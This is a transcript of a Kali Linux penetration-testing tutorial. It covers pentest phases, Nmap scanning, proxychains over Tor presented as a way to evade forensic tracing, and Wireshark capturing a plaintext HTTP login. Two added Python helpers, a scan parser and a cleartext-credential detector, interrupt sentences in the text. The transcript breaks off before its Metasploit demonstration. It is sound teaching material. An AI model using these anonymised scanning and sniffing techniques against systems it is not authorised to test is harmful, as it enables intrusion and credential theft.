Transcript for:
Kali Linux: Features and Tools for Penetration Testing

Hello everyone. It's no secret that the vast bulk of internet usage is vulnerable to hacking, whether it's through hazardous messaging apps or faulty operating systems. Penetration testing has become the norm for vulnerability assessment in order to fill this vacuum in digital security, and Kali Linux is a well-known operating system in this fight against hackers. Kali Linux, a distribution designed specifically for penetration testers, has layers of features that we will go over in today's lesson, and we will take a look at some of the tools and features that the operating system has to offer.

Let's take a look at the video's topics. We start by learning the requirements of an operating system like Kali Linux. We learn more about the core features of the OS and its intricacies. Moving on, we take a look at the five distinct stages of penetration testing that dictate the flow of vulnerability assessment in general. Next, we learn about some important tools that can be found on Kali Linux which are geared specifically for ethical hacking purposes. And finally, we have an extensive demonstration where we work on some basic terminal commands, proxy tools and a couple of highly regarded pieces of software from the crux of the operating system.

Let's start by learning why one should learn Kali Linux in the first place. In today's world, an organization's most valuable asset is its information, or data. This is true for all kinds of businesses, be they public or private. On a daily basis they all deal with enormous amounts of sensitive information; as a consequence, terrorist groups, hacking teams and cyber thieves often attack them. To ensure safety and protection, businesses use a variety of security measures and regularly upgrade their index.

Organizations must be proactive in this age of digitalization by regularly assessing and updating their security. Every day, hackers discover new methods to breach firewalls. Ethical hackers, or white hat hackers, provide a fresh perspective on security: they conduct penetration tests to validate security measures. Generally they will penetrate your networks and give you relevant information about your security posture. Once an organization has this knowledge, it may upgrade its security procedures accordingly.

The latest version of Kali Linux comes with more than 600 penetration tools pre-installed. After reviewing every tool that was included in BackTrack, the developers eliminated a great number of tools that either simply did not work or which duplicated other tools that provided the same or similar functionality. Occasionally, when conducting penetration testing or hacking, we must automate our activities, since there may be hundreds of conditions and payloads to test, and manually examining everything is time consuming. To improve our productivity we utilize tools that come pre-packaged with Kali Linux. These tools not only save us time but also accurately capture and process the data.

The Kali Linux team is made up of a small group of individuals who are the only ones trusted to commit packages and interact with the repositories, all of which is done using multiple secure protocols. Restricting access to critical code bases from external assets greatly reduces the risk of source contamination. Although penetration tools tend to be written in English, the developers have ensured that Kali includes true multilingual support, allowing more users to operate in their native language and locate the tools they need for the job. Since ARM-based single-board systems like the Raspberry Pi are becoming more and more prevalent and inexpensive, the development team knew that Kali's ARM support would need to be as robust as they could manage, with fully working installations. Kali Linux is available on a wide range of ARM devices and has ARM repositories integrated with the mainline distribution, so tools for ARM are updated in conjunction with the rest of the distribution's tools.

Now that we understand the necessity for an operating system like Kali Linux, let us take a look at some of its core features and offerings to the ethical hacking world. Kali Linux, formerly known as BackTrack Linux, is an open source Linux distribution which is aimed at advanced penetration testing and security auditing. It contains several hundred tools targeted towards various information security tasks such as penetration testing, security research, computer forensics and reverse engineering. Kali Linux is a multi-platform solution, accessible and freely available to information security professionals and hobbyists. Among all the Linux distributions, Kali Linux takes its roots from the Debian operating system. Debian has been a highly dependable and stable distribution for many years, providing a similarly strong foundation to the Kali Linux desktop. While the operating system is capable of practically modifying every single part of our installation, the networking components of Kali Linux come disabled by default. This is done to prevent any external factors from affecting the installation procedure, which may pose a risk in critical environments. Apart from boosting security, it allows a deeper element of security and control to the most enthusiastic of users.

Let us now take a look at the five stages, or phases, of penetration testing. The first stage of the penetration test is known as the reconnaissance phase. In this stage the security researcher collects information about the target. It can be done actively, which means you are collecting information without contacting the target, or even both. It helps security firms gather information about the target system: network components, active machines, open ports and access points, operating system details, etc. This activity can be performed by using
information available in the public domain and using different tools.

The next phase is more tool-oriented rather than performed manually, and it is the scanning phase. The penetration tester runs one or more scanner tools to gather more information about the target. By using various scanners such as war dialers, port scanners, network mappers and vulnerability scanners, the tester collects as many vulnerabilities as possible, which helps to turn the attack into a more sophisticated one.

The next stage is known as the gaining access phase. In this phase the penetration tester tries to establish a connection with the target and exploit the vulnerabilities found in the previous stage. Exploitation may be buffer overflow attacks, denial of service (DoS) attacks, session hijacking and many more. Basically, the penetration tester extracts information and sensitive data from servers by gaining access using different tools.

In the maintaining access phase, the penetration tester tries to create a back door for himself. It helps him to identify hidden vulnerabilities in the system and can later act as a gateway to retrieve control of the system.

In the final phase of covering tracks, the penetration tester tries to remove all logs and footprints which help the administrator identify his presence. This helps the tester to think like a hacker and perform corrective actions to mitigate those activities.

Now that we understand the basics of penetration testing and how ethical hackers go about it, let us take a look at some notable tools which can be used on Kali Linux. At the top of the chain lies Nmap. Nmap is a free and open source port scanner utility which can be used for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. It is most beneficial in the early stages of ethical hacking, where a hacker must figure out the possible entry point to a system before running the necessary exploits, thus allowing the hacker to leverage any insecure openings and breach the device. It's a part of the scanning phase of penetration testing. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services these hosts are offering, what operating systems they are running and their versions, what type of packet filters and firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts as well. Since every application that connects to a network needs to do so via a port, the wrong port or server configuration can open a can of worms which leads to a thorough breach of the system and ultimately a fully hacked device.

Next on the list we have Metasploit. The Metasploit Framework is a very powerful tool that can be used by cyber criminals as well as ethical hackers to probe systemic vulnerabilities on networks and servers, as a part of the third stage of penetration testing. It's an open source framework which can be easily customized and used with most operating systems. With Metasploit, the ethical hacking team can use ready-made or custom code and introduce it into a network to probe for weak spots, as another flavor of threat hunting. Once these flaws are identified and documented, the information can be used to address systemic weaknesses and prioritize solutions. Once a particular vulnerability is identified and the exploit is fed into the system, there are a host of options for the hacker. Depending on the vulnerability, hackers can even run root commands from the terminal, allowing complete control over the activities of the compromised system as well as all personal data stored on the device. A big advantage of Metasploit is the ability to run full-fledged scans on a target system, thereby giving a detailed picture of the security index of said system. This also provides the necessary exploits that can be used to bypass the firewalls and the antivirus software. Having a single solution to gather almost all the necessary points of attack is very useful for ethical hackers and penetration testers, as denoted by its high rank in this list.

At number 3 we have Wireshark. Wireshark is the world's foremost and most widely used network protocol analyzer. It lets you see what's happening on your network at a microscopic level and is a de facto standard across many commercial and non-profit enterprises, government agencies and educational institutions. Wireshark is a popular open source tool that captures network packets, in binary, and converts them to a human-readable format. It provides every single detail of the organization's network infrastructure. It consists of devices designed to help measure the ins and outs of the network. The information collected through Wireshark can be used for various purposes, such as real-time or offline network analysis, identification of the traffic coming onto your network, its frequency, and its latency between specific hops. This helps network administrators generate statistics based on real-time data. Wireshark is also a cross-platform tool that can be installed on Windows, Linux and Mac systems to enable hackers in all ecosystems to monitor network traffic irrespective of the operating system. The development team is determined to maintain this level of freedom for their users in the foreseeable future.

The next tool on our list is airgeddon, which is a part of the third phase of penetration testing. This is a multi-use bash script for Linux systems to hack and audit wireless networks like our everyday Wi-Fi router and its counterparts, along with being able to launch denial of service attacks on compromised networks. This multi-purpose Wi-Fi hacking tool has very rich features which support multiple methods for Wi-Fi hacking, including multiple WPS hacking modes, all-in-one WEP attack, handshake file capturing, evil twin attacks, Pixie Dust, and so much more. It usually needs an external network adapter that supports monitor mode, which is necessary to be able to capture wireless traffic traversing the air channels. Due to its open source nature, airgeddon can be used with multiple community plugins and add-ons, thereby increasing its effectiveness against a wide variety of routers in both the 2.4 GHz band and the 5 GHz band.

The next tool is John the Ripper. John the Ripper is an open source password security auditing and password recovery tool available for many operating systems. John the Ripper jumbo supports hundreds of hash and cipher types, including those used for passwords of operating systems, web apps, groupware, database servers, network traffic captures, encrypted private keys, file systems and document files. Some of the key features of the tool include offering multiple modes to speed up password cracking, automatically detecting the hashing algorithm used by the passwords, and the ease of running and configuring the tool, making it a password cracking script of choice for novices and professionals alike. It can use dictionary attacks along with regular brute forcing to speed up the process of cracking the correct password without wasting additional resources. The word list being used in these dictionary attacks can be supplied from the user's end, allowing for a completely customizable process.

Now that we have covered the basics of Kali Linux, let us take a look at the agenda for our demo today. We start out with a few terminal commands that are a basic part of a Linux operating system, and configure our own proxy chains to maintain anonymity while running penetration testing attacks on our victims. Next, we run a few Nmap scans on a local Windows 10 machine to find out the type of information that can be gathered in such a scenario. Moving on, we use Wireshark to monitor internet traffic and understand the importance of encryption and security when browsing the world wide web. Next, we learn about
Metasploit and its various applications in the line of vulnerability assessment of a device, and finally we use Metasploit to take root access of a fully updated Windows 10 computer system.

Let's begin with some terminal basics on Kali Linux. When most people hear the term Linux, they envision a complex operating system used only by programmers. However, the experience is not as frightening as it appears. Linux is an umbrella term for a collection of free and open source Unix operating systems. There are many variants like Ubuntu, Fedora and Debian; these are distributions, which would be the more precise term. When using a Linux operating system, you will most likely utilize a shell, which is a command line interface that provides access to the operating system's services. The majority of Linux distributions ship with a graphical user interface, also known as a GUI, as their primary shell. This is done to facilitate user interaction in the first place. Having said that, a command line interface is suggested due to its increased power and effectiveness: by entering commands into the CLI, tasks that require a multi-step GUI procedure may be completed in a matter of seconds.

We can start the terminal by clicking on the prompt icon here on top. Once the terminal is open we can put in our commands. The first command that we are going to look into is pwd. pwd stands for present working directory. As of right now, what you are seeing is the terminal window by default. If I write pwd and press Enter, this shows the directory in which the terminal is being run. As of right now it's in the nf folder of my desktop, which is specifically this folder. If I open up this folder, you can see it is currently empty, as in it has no contents. If I use another command known as mkdir, which stands for make directory, and I write nf2 (short for new folder two), and open up nf, you can see the new folder is created. This is how the pwd command works.

Another important command is used to change directories; it's called the cd command. Let's say right now I am in nf and I want to create a new file or something else in the nf2 folder; I have to shift with cd nf2. Now if I write pwd it will show the present working directory of /home/simplilearn/Desktop/nf, and inside that I am in nf2 right now. It is used to navigate the Linux files and directories. It requires either the full path or just the name of the directory. If we have to move to a completely different folder or a completely different file, then we can use the entire path, like this. For now, cd works. A few other commands: we can write cd .. and it will come back one folder; now the pwd will be just nf and not nf2. Let's say we are in this folder and we want to go to a different file; let's say we just go for cd /home/simplilearn. That's it: right now these are the folders in our current present working directory. We have the Desktop, the Documents, Downloads, etc. From here we can again go to the Desktop using the same cd command, cross-check the changing of directories and check the files again, and yes, there we go: nf.

How do we know this? What is the command that we used to show the files and folders in that folder? That is known as the ls command. ls can be used to view the contents of a directory. By default, this command will display the contents of your current working directory. If we add some other parameters, we can find the contents of other directories as well. There are some hidden files as well in Linux which cannot be shown just with ls. For example, if you just go to cd /etc, which is a configuration folder for Linux, and write ls, now these are the files that can be seen. If we want to see the hidden files, we'll have to add one more parameter here, like ls -a, and as you can see the number of files has increased this time around. There are other things as well that we can see with Linux: ls -al will show the hidden files along with some of the parameters and some of the permissions that have been provided for each file. As you can see, many of these files have root access; some of them can write, some of them can read. It differs file to file, and the ls -al command is used to check each of these files' permissions and change them accordingly if needed.

The next command that we can look at is the cat command, or concatenate. It is one of the most frequently used commands, and it is used to list the contents of a file on the output. For example, let's say I have a file on the Desktop in this nf2 folder. I will create a document, create an empty file, efile, open up the document and write in it "hello kali", and save this. Now, to change directories from /etc to nf2, we have already discussed how to use the cd command using just the folder name. Now if we want to go to the entire directory, we can write cd /home. As you can see, it is already prompting us to complete the name of the directory; at this point we just have to press Tab and it completes it for us. Next, we already know we have to enter Desktop, nf and nf2, and this brings us to the current working directory. Here, if we press ls, we can find a file. Now, as discussed, concatenate is used to show the contents of a file, so right now if we press cat efile (cat stands for concatenate), as you can see we have written "hello kali" in the text file and we can see the output right now. We can also use it to create new files. For example, if we write cat > efile2, with any file name, here we can write anything, "hello kali again". Once we press Ctrl+C, we can check efile2 and we have "hello kali again" printed. We can see the same using the concatenate command as well: if I press ls you can see we have two files here, and I can go with cat efile2 and I have "hello kali again". This is how the concatenate command works.

Apart from this, there is a different command called cp which is used to copy files from one place to another. Mind you, this is not moving; this is only going to copy. For example, currently our pwd, the present working directory, is the nf2 folder, as you can see. Let's copy efile2 to the nf folder. We can write cp efile2 and give the path of the nf folder, which will be /home/simplilearn/Desktop/nf. Now if I press ls I will find both the files in nf2, since I copied. To go back to the nf folder again, we can again use the same command, cd /home/simplilearn/Desktop/nf (just nf, not nf2 this time). As you can see, this will change back our present working directory. Now when we press ls we will find the efile2 file and the nf2 folder, and we can confirm this using the GUI as well: this is the nf folder, and you can see the nf2 folder and the efile2 document. If I write cat efile2 we can see the contents of the file. Now this can be done using moving as well. For example, if I go to cd nf2, which is the inside folder, it has both the document files, efile and efile2.

Let's say I want to move efile completely from nf2 to nf. Instead of writing cp, the command I'm going to use is mv: mv efile, and again give the path of the folder into which I have to move it, which will again be /home/simplilearn/Desktop/nf. As you can see, the contents of nf2 have appeared here, and efile has been moved from nf2 to nf. This is nf2, and we don't find efile here anymore. If we press cd .. and go back to nf, and ls right now, we can find both the files: efile, that we moved, and efile2, that we copied from the nf2 folder. So this is how copying and moving will work using the terminal. Now, this is just a simple one-line statement that might take a couple of clicks when using a GUI; this is why the command line interface is considered to be much more streamlined for Linux operating systems.

Another very important command for Linux operating systems is the sudo command. sudo is short for "super user do". The command enables you to perform tasks that require administrative or root permissions. We can think of it as how we run programs as administrator on Windows systems. It is not advisable to use this command for daily use, because it might be easy for an error to occur and the permissions of root are very intricate, so new beginners are advised to use the sudo command only when absolutely necessary. For example, sudo su: with this command I am giving this terminal root permission. This su stands for switch user. At this point it's going to ask for my admin password. Once I enter my password, I now have root access. Note how the password that I entered did not show up here; this is a security measure to prevent people from snooping on your root password, which is the end game of all this on the operating system. As you can also see, the symbol changed: if the dollar symbol is showing, it's showing a standard user; when you switch to root you can easily see a hash symbol. This opens up a separate shell inside this terminal. For example, we can exit out of the root user to the standard user using the command exit, and once again we have the dollar sign and the root has vanished.

There are some commands that will only work with administrative access. For example, when updating the Kali Linux system we have to use apt update. As you can see, it says "problem unlinking the file" because permission was denied. Now let's try this using sudo: sudo apt update. As you can see, it is updating the package repositories, which work as the software installed on the system. This can be done either by writing the sudo command every time we want to perform a root action, or we can just write sudo su once and write apt update alone. The fetching is complete. For the second example, let's say I just write sudo su, and this time it is not going to ask me for the password, because in this current terminal process I've already provided the root password once and it is in memory right now. Now, when we used to update the system we had to write sudo apt update; that was because we were running it as a standard user. Now we are running it as the root user, so all we have to write is apt update and it's going to continue its work. There you go.

Another command that can be useful is the ping command. It's pretty self-explanatory: it's going to be checking the internet connectivity. It can be used to check internet connectivity, or if there is a local server on your system which needs to be pinged, then you can check that. For example, we write ping and can use either an IP address or a domain. Let's say we want to check whether we can access google.com using this Kali Linux installation or not: we can write ping google.com, and you can see it shows the bytes being sent and received and how much time it took to serve the request. This can be done for local systems as well. For example, this installation of Kali Linux is being run on a virtual machine. While this machine is running, I still have my whole host machine running, the IP address of which is 192.168.29.179. If I try to ping this from here, as you can see, the time to complete the request is drastically low compared to a website on the internet, considering this is on the local network. This is how the ping command works, and it can show you what kind of packets are transmitted, how many are received, whether there was any kind of packet loss between the connection window, and other details.

A very important command when working with the terminal for long durations is the history command. Pretty self-explanatory: there are so many commands that are being run, and sometimes people forget what was the change they did or what was the directory name they put. The history command helps to recover some of the commands that we have written. It doesn't go all the way back, but it takes up many commands that were input in the last few processes. This is how the history command works. These are some of the most commonly used terminal commands. If you want to learn more about the terminal, please let us know in the comment section and we will try to make an in-depth tutorial specifically for terminal commands on Linux.

Moving on, we learn how to configure proxy chains on our system. Proxying refers to the technique of bouncing your internet traffic through multiple machines to hide the identity of the original machine. A good tool that hackers use to accomplish this goal is proxychains. Essentially, you can use proxychains to run any program through a proxy server. This will allow you to access the internet from behind a restrictive firewall, which hides your IP address. proxychains even allows you to use multiple proxies at once by chaining them together. One of the most important reasons that proxychains is used in a security context is that it's easy to evade detection: attackers often use proxies to
hide their true identities while executing an attack, and when multiple proxies are chained together it becomes harder and harder for forensic professionals to trace the traffic back to the original machine. When these proxies are located across countries, investigators would have to obtain warrants in the local jurisdictions where every proxy is located.

To see how proxychains works, let's open Firefox first and check our current IP address. Write firefox, and there we go; as we can see, Firefox is now open. Let's check our current IP address right now: if you go to an address called myip.com, you can see it easily detects that our country is India, and this is our public IP address. Now, if we move to the terminal again, here we can write proxychains -h. What this -h does is it finds the help; it stands for the help file. What we found out using this is that proxychains has a config file here: /etc/proxychains4.conf. Using this config file we can customize how our proxychains should work. If we want to open that, we have to use it in a text editor. On Windows we have Notepad and other things like Microsoft Word to edit documents; on Linux we have a tool called nano. To access nano we use the command nano and give the path of the file that we want to check. As of right now the proxychains config file is located here, so we're going to follow the path: nano /etc/proxychains4.conf, and here we go, we see the config file.

There are three basic types of proxy chaining here. We have a strict chain, where all the proxies in the list will be used and they will be chained in order. We have a random chain, where each connection made through proxychains will be done by a random combination of proxies in the proxy list. And there is the dynamic chain, which is the same as a strict chain but dead proxies are excluded from the chain. Here we can set up whichever type we want. To enable or disable a particular type, we use the hash symbol here. As you can see, right now all the lines have a hash symbol at the front except this one, dynamic chain; this is the current one being used. Let's say I want to use the strict chain method: I can add a hash here and remove the hash there. At any one point of time, only one of these three types should be enabled. Let's go for the dynamic chain: we can disable the strict chain by putting the hash in front and removing it from the dynamic chain.

As you can see below, we have a few commands for how to handle the nano text editor. This symbol (^) is known as the Control button on your keyboard. Now, if we want to write out, which is synonymous with saving the file, we go with Ctrl+O. So if I press Ctrl+O on my keyboard, it says "File name to write", and we have to press Enter here, since we want to overwrite the proxychains4.conf file; we don't want to create a new file. So just press Enter, and we get a "permission denied". This permission denied we're getting is because we have opened this as a standard user; /etc is a system folder, and to be able to make some changes we have to open it using the sudo command. To exit nano we have to use Ctrl+X. We use Ctrl+X, we're going to clear, and this time we're going to use the sudo command: sudo nano /etc/proxychains4.conf, and we have the same file open up again. Now this time, if you want to make a change, let's say we're going to add a strict chain instead of a dynamic chain: we remove the hash from strict, we use Ctrl+O for the save file option, we press Enter, and it says "Wrote 160 lines". Again, if you want to reverse this change, we put the hash over here, enable dynamic chain, press Ctrl+O, press Enter, and it says "Wrote 160 lines". Now we can exit straight away using Ctrl+X.

Right now we have not provided any proxies to proxychains. We can get proxy IP addresses from the internet, but we have to make sure that they are safe and that they don't snoop on our data. When there is no proxy chain being provided, by default it's going to use the Tor network, but for that we have to start Tor. Tor is a service in Linux. To know more about the Tor service, we can write sudo systemctl, which is used to know the status of services on the Linux operating system, and status tor: sudo systemctl status tor. As you can see, it is the Tor service, an anonymizing overlay network for TCP connections, and it's currently inactive. Now to start this up, we have to write sudo systemctl start tor. Now if we repeat the same sudo systemctl status tor, as you can see it's active now; you can see the green logo over here. Okay, to integrate Firefox, the browser, we can use the proxychains command directly over here: we can write proxychains firefox to launch our web browser, and let's say we want to visit google.com. We press Enter, and the Firefox window is launched and it should open up google.com next. And there we go. If we go to myip.com once again, as you can see we have a different IP address, and the country is unknown as well. So this is how we can use proxychains to anonymize internet usage when using Kali Linux.

Next on our agenda is the ability to scan networks using Nmap. At its core, Nmap is a network scanning tool that uses IP packets to identify all the devices connected to a network. We can learn more about Nmap using the help file. As you can see, these are some of the parameters that can be used when scanning ports of our system; you can see the version and the URL of the website of the service over here. The primary uses of Nmap can be broken into three processes. First, the program gives you detailed information on every IP active on your network, and then each IP can be scanned. Secondly, it can also be used for providing a list of live hosts and open ports, as well as identifying the OS of every connected device. Thirdly, Nmap has also become a valuable tool for users looking to protect personal and business
websites. Using Nmap to scan your own web server, particularly if you're hosting your website from home, is essentially simulating the process that a hacker would use to attack your site. Attacking your own site in this way is a powerful way of identifying security vulnerabilities. As we already discussed, the host Windows 10 machine on the system has an IP address of 192.168.29.179. If you want to test the OS scan of the system, we're going to first get the root permission over here; we use the sudo command and now we are the root user. We're going to launch the command nmap -O, which is supposed to be an OS detection scan, and the IP address; we can use the IP address of the host system, 192.168.29.179. In a legitimate penetration testing scenario we can use the IP address of the device over here. We are going to let it scan for a while and it's going to give us some guesses on what the OS can be. As you can see the scan is done and it has shown some of the ports that are open: you can see the msrpc port open, the HTTPS 443 port open, which is used to connect to the internet, and it has some aggressive OS guesses as well. For example, it thinks there's a 94 percent chance that it's going to be Microsoft Windows XP Service Pack 3.
That's partly because a lot of the Windows XP update packages are still prevalent on Windows. Now that the OS detection is confirmed, there are multiple more details that we can gather from Nmap. Let's go with the nmap -A command, which is supposed to capture as much data as possible. There is also a speed setting, you can call it a speed setting or a control setting, of -T; -T ranges from T0 to T1 to T2, all the way up to T5. This basically determines how aggressively the victim is being scanned. If you scan slowly it will take more time to provide the results, but it will also give less chance for the intrusion detection system or firewall on the vulnerable machine to detect that someone is trying to penetrate the network. For now, if we want to go with somewhat of a high speed, we can go with T4 and provide the same IP address of the local machine I am trying to attack. It's going to take a little bit of time since it's trying to capture a lot of information.

As you can see the results are now here. It launched a scan and took a few top ports that are most likely vulnerable from a Windows XP perspective, and it showed a few ports over here. It says "Not shown: 991 filtered ports", which could not be attacked anyway since they were closed for outside access. It shows a few fingerprint settings like the connection policies and the port details; it shows the HTTP options and some other intricate details that can be used when attacking its servers. It shows a VMware version that it's running and a few other ports over here. Apart from that we also have the aggressive OS guesses over here, just like we did with -O, and you can see this time it is showing Windows 7 at 98 percent. No exact OS matches, since if there were any exact OS matches we could have seen a hundred percent chance over here. This is a traceroute; a traceroute will be the time and the path a connection request takes from the source to the destination. For example, this request went
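When you scan your own server the way the video recommends, the useful output is the port table and the OS guess lines; reading them by eye does not scale past one host. As an added Python example (not code from the video or from the Nmap project), this parses the normal-output format into a structure and lists the open ports you did not intend to expose. The scan text is constructed in the layout of Nmap's output; the port, service and version strings are invented for illustration, and the host address is the one the video scans.

```python
"""Parse Nmap normal output and review the open ports against an allowlist.

Added example, not from the video or from Nmap. SAMPLE_NMAP is a constructed
excerpt in the layout of `nmap -O -sV` normal output.
"""
import re

SAMPLE_NMAP = """\
Nmap scan report for 192.168.29.179
Host is up (0.00052s latency).
Not shown: 991 filtered ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp  open  ssl/https     VMware Workstation SOAP API
445/tcp  open  microsoft-ds
902/tcp  open  ssl/vmware-auth VMware Authentication Daemon
Aggressive OS guesses: Microsoft Windows 7 (98%), Microsoft Windows XP SP3 (94%)
No exact OS matches for host (test conditions non-ideal).
"""

# "135/tcp  open  msrpc  Microsoft Windows RPC" -> port, proto, state, service, version
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# "Microsoft Windows 7 (98%)" entries, comma separated on the guesses line
OS_GUESS = re.compile(r"([^,]+?) \((\d+)%\)")


def parse_nmap(text):
    """Return host, hidden-port count, port table and OS guesses from one report."""
    report = {"host": None, "not_shown": 0, "ports": [], "os_guesses": []}
    for line in text.splitlines():
        if line.startswith("Nmap scan report for "):
            report["host"] = line.split()[-1]
        elif line.startswith("Not shown:"):
            report["not_shown"] = int(line.split()[2])
        elif line.startswith("Aggressive OS guesses:"):
            guesses = line.split(":", 1)[1]
            report["os_guesses"] = [(name.strip(), int(pct))
                                    for name, pct in OS_GUESS.findall(guesses)]
        else:
            m = PORT_LINE.match(line)
            if m:
                port, proto, state, service, version = m.groups()
                report["ports"].append({"port": int(port), "proto": proto,
                                        "state": state, "service": service,
                                        "version": version or ""})
    return report


def unexpected_open_ports(report, expected):
    """Open ports that are not in the set of ports you meant to expose."""
    return sorted(p["port"] for p in report["ports"]
                  if p["state"] == "open" and p["port"] not in expected)


def best_os_guess(report):
    """Highest-confidence (name, percent) guess, or None when Nmap offered none."""
    return max(report["os_guesses"], key=lambda g: g[1], default=None)


if __name__ == "__main__":
    r = parse_nmap(SAMPLE_NMAP)
    print(r["host"], "best guess:", best_os_guess(r))
    # Constructed allowlist: only HTTPS is meant to be reachable on this host.
    print("unexpected open ports:", unexpected_open_ports(r, {443}))
```

The allowlist ({443} here) is the part you own: any port that turns up outside it is a finding to explain or close, which is the defensive point of scanning your own machine.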
from 192.168.72.2 to a destination address. Since this is a local machine it took only a single step; on multiple occasions, if you're trying to access a remote system, it's going to be a number of traceroute hops when it jumps from firewall to firewall and router to router. This is how we can use Nmap to find information about a system and find some vulnerable ports we can access.

Moving on, we have a tutorial on how to use Wireshark to sniff network traffic. To start using Wireshark we're going to have to open the application first. Now, during installation of Wireshark there is an option to enable whether non-root users can capture traffic or not. In my installation I have disabled that, so I will be launching Wireshark using the root user itself. Also, to capture data we need an external Wi-Fi adapter; you can see it over here in the VM tab, Removable Devices, Realtek 802.11n WLAN. This is an external Wi-Fi adapter which is inserted into my USB system; you can see it over here if I write iwconfig, this is the one, wlan0.
This is absolutely necessary because we need to have monitor mode. We won't need it for sniffing data on Wireshark right now, but it's going to be necessary later on in this tutorial, as we will see. For now we can just start up Wireshark by writing its name on the command line and it should start the program. Here we go. Here it's going to check which of the adapters we want to use; for example, right now eth0, which is supposed to stand for Ethernet 0 port, you can see data is being transmitted up and down. We're going to select eth0 and we have started capturing data. You can see this data request from the source to the destination, the time and which protocol it is following; everything we can see, and we can see the IPv4 flags here as well.

As you can see over here, to capture internet traffic we can try running Firefox. If we just write wikipedia.com you can see the number of requests increasing (okay, this is a spelling mistake, wikipedia). Here you can see the application data of all these requests going up, and they're connected to a destination server of 103.102.166.224. Now even if we check the Transmission Control Protocol flags over here and so many more things, we cannot find anything beneficial; as you can see the information over here is gibberish, which is as it should be since it's supposed to be encrypted. Now this is possible due to this being an HTTPS website, hence you can see the lock symbol over here and the connection is supposed to be secure.

Now what about HTTP? We have seen many people recommend not to visit HTTP websites, and even if we have to visit, not to provide any critical information. For example, let's go to a random HTTP page over here. As you can see this is saying the connection is not secure, and this is an HTTP page and not HTTPS. Now let's check for some of the information that is passing through this. This is a login
form. Let's say I have a legitimate account over here. If I write my account name, and my password is supposed to be password1234, I press Login and the password does not match, because I do not have an account over here. But let's say I did and I was logged in as expected. We can go to Wireshark and we can use filters over here. Now all the requests that I am sending are TCP requests, so I can write a filter, tcp contains "whatever string", if it is being passed. Let's say for the username I wrote my account name, so I can just write my account name over here and press Enter to find a request over here. Now as you can see there are many flags over here; if we go to the HTML Form URL Encoded section and open up some of its flags, as you can see I can see my account name, simplilearn, and the password over here. These are the same details that I input on the website. Let's say I did have a legitimate account on this website: I would have logged in with no problems, but anyone who would be using Wireshark to sniff on the data can easily get my credentials from here. This is why it's recommended not to provide any information on HTTP pages; the security is not up to the mark, and always look for the lock symbol when visiting any website or making any internet transactions or providing any information. This is how we can use Wireshark to detect transmission and sniff packet data that is being transferred to the network adapter.

Next we have to learn about what Metasploit is. The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS development. We can open up the terminal here, we're going to allow root access, and to open up Metasploit the keyword is msfconsole. It's going to take a little bit of time to start it up. Now the Metasploit console has been loaded; from here we can decide what type of attack we want to launch and what kind of exploits we can launch against vulnerable
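The Wireshark part of the video shows why a form POST over plain HTTP is readable on the wire, found with a `tcp contains` filter and the "HTML Form URL Encoded" dissector. As an added Python example (not code from the video or from Wireshark), this is the same check written as a monitoring rule a defender can run over captured TCP payloads: it implements the `tcp contains` test, parses the HTTP request, and reports which credential-looking form fields were submitted in the clear, without copying the values themselves into the report. The packets are constructed; the HTTP host, addresses and the password1234 value are illustrative, and the TLS packet is a few made-up handshake bytes standing in for the gibberish the video shows for HTTPS.

```python
"""Flag credentials submitted over cleartext HTTP in captured TCP payloads.

Added example, not from the video or from Wireshark. SAMPLE_PACKETS is
constructed; addresses, host names and form values are made up.
"""
from dataclasses import dataclass
from urllib.parse import parse_qsl

# Field names that usually carry a login secret or identity.
CRED_FIELDS = ("pass", "pwd", "passwd", "user", "login", "email")


@dataclass
class Packet:
    src: str
    dst: str
    dport: int
    payload: bytes  # TCP segment payload as captured


SAMPLE_PACKETS = [
    # Constructed login POST over HTTP (port 80): the body is readable as-is.
    Packet("192.168.72.130", "203.0.113.10", 80,
           b"POST /login.php HTTP/1.1\r\n"
           b"Host: example-http-site.test\r\n"
           b"Content-Type: application/x-www-form-urlencoded\r\n"
           b"Content-Length: 40\r\n\r\n"
           b"username=myaccount&password=password1234"),
    # Constructed plain page fetch: no form, nothing to report.
    Packet("192.168.72.130", "203.0.113.10", 80,
           b"GET /index.html HTTP/1.1\r\nHost: example-http-site.test\r\n\r\n"),
    # Constructed HTTPS segment: TLS bytes, opaque to a sniffer.
    Packet("192.168.72.130", "103.102.166.224", 443,
           b"\x16\x03\x01\x02\x00\x01\x00\x01\xfc\x03\x03\x8a\x1b"),
]


def tcp_contains(pkt, needle):
    """Equivalent of the Wireshark display filter  tcp contains "needle"."""
    return needle.encode() in pkt.payload


def parse_http_request(payload):
    """Return method, path, headers and body, or None if this is not an HTTP request."""
    try:
        text = payload.decode("ascii")
    except UnicodeDecodeError:
        return None  # binary data such as TLS
    head, _, body = text.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": parts[0], "path": parts[1], "headers": headers, "body": body}


def find_cleartext_credentials(packets):
    """Report form POSTs over HTTP whose field names look like credentials.

    Only field names are reported; the submitted values never leave this function.
    """
    findings = []
    for pkt in packets:
        req = parse_http_request(pkt.payload)
        if req is None or req["method"] != "POST":
            continue
        ctype = req["headers"].get("content-type", "")
        if not ctype.startswith("application/x-www-form-urlencoded"):
            continue
        fields = parse_qsl(req["body"], keep_blank_values=True)
        cred = [name for name, _ in fields
                if any(k in name.lower() for k in CRED_FIELDS)]
        if cred:
            findings.append({"host": req["headers"].get("host", pkt.dst),
                             "path": req["path"], "fields": cred,
                             "dst": "%s:%d" % (pkt.dst, pkt.dport)})
    return findings


if __name__ == "__main__":
    for f in find_cleartext_credentials(SAMPLE_PACKETS):
        print("cleartext credential form:", f)
```

Run over a real capture (for example payloads exported from tshark or pyshark) the same function tells you which internal applications still take logins over HTTP, which is the fix the video is pointing at: move those forms to HTTPS rather than hoping nobody is sniffing.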
